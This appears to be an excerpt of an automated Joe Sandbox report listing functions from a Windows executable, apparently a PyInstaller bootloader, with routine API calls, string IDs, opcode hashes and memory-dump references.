• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                                                • Opcode ID: d956f0b8ec152b18ca11aa0aed68125bebf2684d60339ba7369f52f17a1fcfe1
                                                                                                                                                                                                                                                                                • Instruction ID: c32ded0085af7a528bb5d8068915a1737b956261be5281e1811fcfa2c770ae9f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d956f0b8ec152b18ca11aa0aed68125bebf2684d60339ba7369f52f17a1fcfe1
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17412822B1D60261FAB5EB16A8002B5B391BF44BA0F84C13DDD1DA7394DF3DE445E320

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF733392BC5), ref: 00007FF733392AA1
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF733392BC5), ref: 00007FF733392AAB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733392310: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF733392AC6,?,00007FF733392BC5), ref: 00007FF733392360
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733392310: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF733392AC6,?,00007FF733392BC5), ref: 00007FF73339241A
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentErrorFileFormatLastMessageModuleNameProcess
                                                                                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                                                • API String ID: 4002088556-2863816727
                                                                                                                                                                                                                                                                                • Opcode ID: 093d1e49c6a3f32bbd7db28c580ca23961d52f0e240546522d41da137270d6a4
                                                                                                                                                                                                                                                                                • Instruction ID: 2b51c687ba7fa9efcf1a9f2969bb0de15a45b974add65c52cb1c15ae2821de0e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 093d1e49c6a3f32bbd7db28c580ca23961d52f0e240546522d41da137270d6a4
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D21A811B1D946E1FAF4BB24E8043BAE290BF48755FC08139D54EE61E5EE3CD504D324

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                • Opcode ID: e215fe86d7b0e6e2d08488d11c6944312657e99f94033e5188670243fcaba875
                                                                                                                                                                                                                                                                                • Instruction ID: 745e85b23fc6311122dd17886565fed9b1b60e74529c004fa30aa9d9f0010372
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e215fe86d7b0e6e2d08488d11c6944312657e99f94033e5188670243fcaba875
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88C1E73290C78271E7B1AB1990442BDFBA0FF81B80FD58139DA6E63791CE7DE445A760

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                                                                                • Opcode ID: cf92fa18b9e00c3d9d6dbbac75613ba75212e4a615f40cb6368d246a710d7e34
                                                                                                                                                                                                                                                                                • Instruction ID: 04e82fe40d00ed7fd20e87ab85519967e73d4219148647cf28ceacf57547ba37
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf92fa18b9e00c3d9d6dbbac75613ba75212e4a615f40cb6368d246a710d7e34
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91217931A0CA4291EBA0AB59F44067AF3A1FF857E0F908239E66C53AE4DF7CD5459B10

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397BB0: GetCurrentProcess.KERNEL32 ref: 00007FF733397BD0
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397BB0: OpenProcessToken.ADVAPI32 ref: 00007FF733397BE3
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397BB0: GetTokenInformation.KERNELBASE ref: 00007FF733397C08
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397BB0: GetLastError.KERNEL32 ref: 00007FF733397C12
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397BB0: GetTokenInformation.KERNELBASE ref: 00007FF733397C52
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397BB0: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF733397C6E
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397BB0: CloseHandle.KERNEL32 ref: 00007FF733397C86
                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00007FF733393099), ref: 00007FF73339864C
                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00007FF733398655
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                                                • Opcode ID: d798866db3bd5df2efb7bc743f04e88858d4d647152387f2e8ebfd41b25b19db
                                                                                                                                                                                                                                                                                • Instruction ID: c07713477eb6f86c7b352283a97cc615235c782a3eaa1b3554b24286b8b3447a
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d798866db3bd5df2efb7bc743f04e88858d4d647152387f2e8ebfd41b25b19db
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02215E21A08746E2F6A4BB50E4153FAB365EF88780FC48039EA4D67796DF3CD944A760
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(00000000,?,00007FF7333928EC,FFFFFFFF,00000000,00007FF73339336A), ref: 00007FF733397372
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                                                • Opcode ID: 61b418e99efde3a0f519453cac267e08843ad3bf0b3a29706ebb583658b230ee
                                                                                                                                                                                                                                                                                • Instruction ID: 4c98dd935906a5c8374685724435543852a434541c462b9502c65bfe037dbcbf
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61b418e99efde3a0f519453cac267e08843ad3bf0b3a29706ebb583658b230ee
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F31FA2171DAC1E5FAB1AB20E4503EAA358EB88BE0F808234EE9D537C9DE3CD5059710
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7333ADE4B), ref: 00007FF7333ADF7C
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7333ADE4B), ref: 00007FF7333AE007
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                                                • Opcode ID: 25026d299ec132fa7e986de3a50f80dd4a1c565eb46710a002b358a032e27337
                                                                                                                                                                                                                                                                                • Instruction ID: 1b3a8ab2f18e617455ce5b354495c4b0f5a17f7e344fea31bcc4717a08b232dc
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25026d299ec132fa7e986de3a50f80dd4a1c565eb46710a002b358a032e27337
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D91B632E19652A5F7B0EF6594502BDABA0BB44B88F94813DDE1E77694CE3CD481E320
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                                                                                • Opcode ID: 89e82a0bcb92f9a57c8ce538440e566bc748d838767a3902d6c6661200ebf515
                                                                                                                                                                                                                                                                                • Instruction ID: 589b834d465d370d583831f45fe310505fb3b9335d21e7f309d2f3edefa96145
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89e82a0bcb92f9a57c8ce538440e566bc748d838767a3902d6c6661200ebf515
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1510772F081159AEB74EF24D9516FCB761AB00399F90823DDE1EA2AE5DF3CA441D710
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2780335769-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 1236291503-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF7333AD020,?,?,?,?,?,00007FF7333AD129), ref: 00007FF7333AD080
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00007FF7333AD020,?,?,?,?,?,00007FF7333AD129), ref: 00007FF7333AD08A
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7333A67F5), ref: 00007FF7333A6913
                                                                                                                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7333A67F5), ref: 00007FF7333A6929
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,?,?,00007FF7333B3F92,?,?,?,00007FF7333B3FCF,?,?,00000000,00007FF7333B4495,?,?,?,00007FF7333B43C7), ref: 00007FF7333AB47A
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7333B3F92,?,?,?,00007FF7333B3FCF,?,?,00000000,00007FF7333B4495,?,?,?,00007FF7333B43C7), ref: 00007FF7333AB484
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,00007FF7333AB8DD,?,?,00000000,00007FF7333AB992), ref: 00007FF7333ABACE
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7333AB8DD,?,?,00000000,00007FF7333AB992), ref: 00007FF7333ABAD8
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
• __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF73339C3F0
  • Part of subcall function 00007FF73339CE18: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF73339CE20
  • Part of subcall function 00007FF73339CE18: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF73339CE25
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
• String ID:
• API String ID: 1208906642-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF7333AC22A,?,?,?,00007FF7333A5E51,?,?,?,?,00007FF7333AB392), ref: 00007FF7333AFE59
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
                                                                                                                                                                                                                                                                                APIs
